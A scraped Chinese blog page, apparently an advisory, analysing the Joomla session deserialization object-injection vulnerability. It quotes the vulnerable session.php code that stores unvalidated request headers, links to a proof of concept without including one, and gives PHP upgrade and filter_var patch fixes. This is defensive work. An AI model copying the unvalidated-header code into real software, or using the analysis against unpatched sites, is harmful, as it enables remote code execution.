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" alt="" />

Relevant Link:

https://github.com/php/php-src/blob/PHP-5.4.5/ext/session/session.c

4. 漏洞代码分析

\Joomla_3.4.5_to_3.4.6-Stable-Patch_Package\libraries\joomla\session\session.php

// Record proxy forwarded for in the session in case we need it later

        if (isset($_SERVER['HTTP_X_FORWARDED_FOR']))

        {

            //将HTTP数据包中的HTTP_X_FORWARDED_FOR保存到全局SESSION中

            $this->set('session.client.forwarded', $_SERVER['HTTP_X_FORWARDED_FOR']);

        }

        // Check for client address

        if (in_array('fix_adress', $this->_security) && isset($_SERVER['REMOTE_ADDR']))

        {

            $ip = $this->get('session.client.address');

            if ($ip === null)

            {

                $this->set('session.client.address', $_SERVER['REMOTE_ADDR']);

            }

            elseif ($_SERVER['REMOTE_ADDR'] !== $ip)

            {

                $this->_state = 'error';

                return false;

            }

        }

        // Check for clients browser

        if (in_array('fix_browser', $this->_security) && isset($_SERVER['HTTP_USER_AGENT']))

        {

            $browser = $this->get('session.client.browser');

            if ($browser === null)

            {

                //将HTTP数据包中的HTTP_X_FORWARDED_FOR保存到全局SESSION中

                $this->set('session.client.browser', $_SERVER['HTTP_USER_AGENT']);

            }

            elseif ($_SERVER['HTTP_USER_AGENT'] !== $browser)

            {

                // @todo remove code: $this->_state = 'error';

                // @todo remove code: return false;

            }

        }

攻击者发送的畸形HTTP数据包的数据,会被joomla保存到全局SESSION中,Session默认初始化是在所有代码执行之前,然而joomla使用自定义存储session机制,替换了php自带的存储方式使用session_set_save_handler自定义了session存储函数
\Joomla_3.4.5\libraries\joomla\session\storage.php

public function register()

{

    // Use this object as the session handler

    session_set_save_handler(

    array($this, 'open'), array($this, 'close'), array($this, 'read'), array($this, 'write'), array($this, 'destroy'), array($this, 'gc')

    );

}

Relevant Link:

http://zone.wooyun.org/content/24440

http://zone.wooyun.org/content/24444

http://drops.wooyun.org/papers/11330

5. POC构造技巧

http://drops.wooyun.org/papers/11330

6. 防御方案

. /Joomla/configuration.php

class JConfig

{

    ..

    public $session_handler = 'files';

}

. 升级PHP >= 5.6.

从PHP 5.6.13开始,如果第一个变量解析错误,直接销毁整个session 

. joomla CMS代码修复

https://github.com/joomla/joomla-cms/releases/download/3.4.6/Joomla_3.4.5_to_3.4.6-Stable-Patch_Package.tar.gz

\Joomla_3..5_to_3.4.6-Stable-Patch_Package\libraries\joomla\session\session.php

. 去除HTTP_USER_AGENT的接收

. 使用filter_var验证HTTP_X_FORWARDED_FOR是否符合IP格式,防御通过这个字段的注入攻击

// Check for client address

if (in_array('fix_adress', $this->_security) && isset($_SERVER['REMOTE_ADDR']) && filter_var($_SERVER['REMOTE_ADDR'], FILTER_VALIDATE_IP) !== false)

{

    $ip = $this->get('session.client.address');

    if ($ip === null)

    {

        $this->set('session.client.address', $_SERVER['REMOTE_ADDR']);

    }

    elseif ($_SERVER['REMOTE_ADDR'] !== $ip)

    {

        $this->_state = 'error';

        return false;

    }

}

// Record proxy forwarded for in the session in case we need it later

if (isset($_SERVER['HTTP_X_FORWARDED_FOR']) && filter_var($_SERVER['HTTP_X_FORWARDED_FOR'], FILTER_VALIDATE_IP) !== false)

{

    $this->set('session.client.forwarded', $_SERVER['HTTP_X_FORWARDED_FOR']);

}

Relevant Link:

7. Code Pathc方案

\libraries\joomla\session\session.php

// Record proxy forwarded for in the session in case we need it later

        /*

        if (isset($_SERVER['HTTP_X_FORWARDED_FOR']))

        */

        if (isset($_SERVER['HTTP_X_FORWARDED_FOR']) && filter_var($_SERVER['HTTP_X_FORWARDED_FOR'], FILTER_VALIDATE_IP) !== false)

        {

            $this->set('session.client.forwarded', $_SERVER['HTTP_X_FORWARDED_FOR']);

        }

        // Check for client address

        /*

        if (in_array('fix_adress', $this->_security) && isset($_SERVER['REMOTE_ADDR']))

        */

        if (in_array('fix_adress', $this->_security) && isset($_SERVER['REMOTE_ADDR']) && filter_var($_SERVER['REMOTE_ADDR'], FILTER_VALIDATE_IP) !== false)

        {

            $ip = $this->get('session.client.address');

            if ($ip === null)

            {

                $this->set('session.client.address', $_SERVER['REMOTE_ADDR']);

            }

            elseif ($_SERVER['REMOTE_ADDR'] !== $ip)

            {

                $this->_state = 'error';

                return false;

            }

        }

        // Check for clients browser

        if (in_array('fix_browser', $this->_security) && isset($_SERVER['HTTP_USER_AGENT']))

        {

            /*

            $browser = $this->get('session.client.browser');

            */

            $browser = "";

            if ($browser === null)

            {

                /*

                $this->set('session.client.browser', $_SERVER['HTTP_USER_AGENT']);

                */

                $this->set('session.client.browser', "");

            }

            elseif ($_SERVER['HTTP_USER_AGENT'] !== $browser)

            {

                // @todo remove code: $this->_state = 'error';

                // @todo remove code: return false;

            }

        }

Copyright (c) 2015 Little5ann All rights reserved

joomla \libraries\joomla\session\session.php 反序列化截断畸形字符串导致对象注入漏洞的更多相关文章

  1. joomla对象注入漏洞分析

    0x00 漏洞简单介绍 jooomla 1.5 到 3.4.5 的全部版本号中存在反序列化对象造成对象注入的漏洞,漏洞利用无须登录,直接在前台就可以运行随意PHP代码. Joomla 安全团队紧急公布 ...

  2. dedecms SESSION变量覆盖导致SQL注入漏洞修补方案

    dedecms的/plus/advancedsearch.php中,直接从$_SESSION[$sqlhash]获取值作为$query带入SQL查询,这个漏洞的利用前提是session.auto_st ...

  3. PHP反序列化中过滤函数使用不当导致的对象注入

    1.漏洞产生的原因 ####  正常的反序列化语句是这样的 $a='a:2:{s:8:"username";s:7:"dimpl3s";s:8:"pa ...

  4. PHP Session 序列化及反序列化处理器设置使用不当带来的安全隐患(转)

    PHP Session 序列化及反序列化处理器设置使用不当带来的安全隐患 时间 2014-11-14 15:05:49  WooYun知识库 原文  http://drops.wooyun.org/t ...

  5. Joomla CMS 3.2-3.4.4 SQL注入 漏洞分析

    RickGray · 2015/10/26 11:24 昨日,Joomla CMS发布新版本3.4.5,该版本修复了一个高危的SQL注入漏洞,3.2至3.4.4版本都受到影响.攻击者通过该漏洞可以直接 ...

  6. Cookie和Session(session过程和设置进程外session)

    cookie 和  session 的区别 cookie 是保存在客户端上的一种机制   而session 是保存在服务端的一种机制 cookie的理解: 打个简单的比方,一个人生病了去A医院看病,回 ...

  7. 巨人大哥谈Web应用中的Session(session详解)

    巨人大哥谈Web应用中的Session(session详解) 虽然session机制在web应用程序中被采用已经很长时间了,但是仍然有很多人不清楚session机制的本质,以至不能正确的应用这一技术. ...

  8. Session session = connection.createSession(paramA,paramB);参数解析

    Session session = connection.createSession(paramA,paramB); paramA是设置事务,paramB是设置acknowledgment mode ...

  9. JMS Session session = connection.createSession(paramA,paramB) 两个参数不同组合下的含义和区别

    Session session = connection.createSession(paramA,paramB); paramA是设置事务,paramB是设置acknowledgment mode ...

随机推荐

  1. Easyui Tree方法扩展 - getLevel(获取节点级别)

    Easyui Tree一直就没有提供这个方法,以前没有用到,所以一直没怎么在意,这次自己用到了,顺便扩展了一个方法,分享给大家. $.extend($.fn.tree.methods, { getLe ...

  2. Linux socket多进程服务器框架一

    重点:socket共用方法中错误码的定义以及错误码的解析 底层辅助代码 //serhelp.h #ifndef _vxser #define _vxser #ifdef __cplusplus ext ...

  3. PCL 库安装

    参考资料: http://www.cnblogs.com/newpanderking/articles/4022322.html VS2010+PCL配置 PCL共有两种安装方式 安全安装版,个人配置 ...

  4. [转]关于Python中的yield

    在介绍yield前有必要先说明下Python中的迭代器(iterator)和生成器(constructor). 一.迭代器(iterator) 在Python中,for循环可以用于Python中的任何 ...

  5. 如何在 Apache 中为你的网站设置404页面

    一个好的网站,拥有一个好的 404页面 是标配. 为何要有 404页面?如何设置一个 404页面? why 404 pages? 在本地,比如我打开 localhost/fuck.htm(该文件不存在 ...

  6. NodeJs爬虫—“眼睛好看是一种什么样的体验?”

    逛知乎的时候经常看见有好多的福利贴(钓鱼贴),这不最近又让我发现了一个——眼睛好看是一种什么样的体验是一种怎么样的体验呢?我决定把答案里的照片都下到我的电脑里好好体验一下,怎么做呢,一张一张下好麻烦, ...

  7. sql中去除重复的项

    方法一:group by  (取最小的id)select min(id) id,T from Table_1 group by T 方法二:union (不需要id)select T from Tab ...

  8. java的HashCode方法

    总的来说,Java中的集合(Collection)有两类,一类是List,再有一类是Set. 前者集合内的元素是有序的,元素可以重复: 后者元素无序,但元素不可重复. 要想保证元素不重复,可两个元素是 ...

  9. Google 面试

    坚持完成这套学习手册,你就可以去 Google 面试了 系统 指针 value Google 面试 阅读10266   本文为掘金投稿,译文出自:掘金翻译计划 原文地址:Google Intervie ...

  10. 【转】java.util.ResourceBundle使用详解

    原文链接:http://lavasoft.blog.51cto.com/62575/184605/ 人家写的太好了,条理清晰,表达准确.   一.认识国际化资源文件   这个类提供软件国际化的捷径.通 ...